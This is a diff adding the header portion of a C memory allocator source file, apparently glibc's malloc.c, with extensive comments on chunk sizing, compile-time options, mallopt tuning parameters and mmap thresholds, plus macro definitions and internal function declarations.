+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+    MALLOC_ALIGNMENT           MAX (2 * sizeof(INTERNAL_SIZE_T),
+				    __alignof__ (long double))
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <malloc-machine.h>
+#include <malloc-sysdep.h>
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-internal.h>
+
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  INTERNAL_SIZE_T is the word-size used for internal bookkeeping
+  of chunk sizes.
+
+  The default version is the same as size_t.
+
+  While not strictly necessary, it is best to define this as an
+  unsigned type, even if size_t is a signed type. This may avoid some
+  artificial size limitations on some systems.
+
+  On a 64-bit machine, you may be able to reduce malloc overhead by
+  defining INTERNAL_SIZE_T to be a 32 bit `unsigned int' at the
+  expense of not being able to handle more than 2^32 of malloced
+  space. If this limitation is acceptable, you are encouraged to set
+  this unless you are on a platform requiring 16byte alignments. In
+  this case the alignment requirements turn out to negate any
+  potential advantages of decreasing size_t word size.
+
+  Implementors: Beware of the possible combinations of:
+     - INTERNAL_SIZE_T might be signed or unsigned, might be 32 or 64 bits,
+       and might be the same width as int or as long
+     - size_t might have different width and signedness as INTERNAL_SIZE_T
+     - int and long might be 32 or 64 bits, and might be the same width
+  To deal with this, most comparisons and difference computations
+  among INTERNAL_SIZE_Ts should cast them to unsigned long, being
+  aware of the fact that casting an unsigned int to a wider long does
+  not sign-extend. (This also makes checking for negative numbers
+  awkward.) Some of these casts result in harmless compiler warnings
+  on some systems.
+*/
+
+#ifndef INTERNAL_SIZE_T
+#define INTERNAL_SIZE_T size_t
+#endif
+
+/* The corresponding word size */
+#define SIZE_SZ                (sizeof(INTERNAL_SIZE_T))
+
+
+/*
+  MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks.
+  It must be a power of two at least 2 * SIZE_SZ, even on machines
+  for which smaller alignments would suffice. It may be defined as
+  larger than this though. Note however that code and data structures
+  are optimized for the case of 8-byte alignment.
+*/
+
+
+#ifndef MALLOC_ALIGNMENT
+# if !SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_16)
+/* This is the correct definition when there is no past ABI to constrain it.
+
+   Among configurations with a past ABI constraint, it differs from
+   2*SIZE_SZ only on powerpc32.  For the time being, changing this is
+   causing more compatibility problems due to malloc_get_state and
+   malloc_set_state than will returning blocks not adequately aligned for
+   long double objects under -mlong-double-128.  */
+
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ < __alignof__ (long double)      \
+                                  ? __alignof__ (long double) : 2 *SIZE_SZ)
+# else
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ)
+# endif
+#endif
+
+/* The corresponding bit mask value */
+#define MALLOC_ALIGN_MASK      (MALLOC_ALIGNMENT - 1)
+
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   the maximum total allocated space. This will be greater
+		than current total if trimming has occurred.
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+#ifndef NO_THREADS
+static void*   malloc_atfork(size_t sz, const void *caller);
+static void      free_atfork(void* mem, const void *caller);
+#endif
+
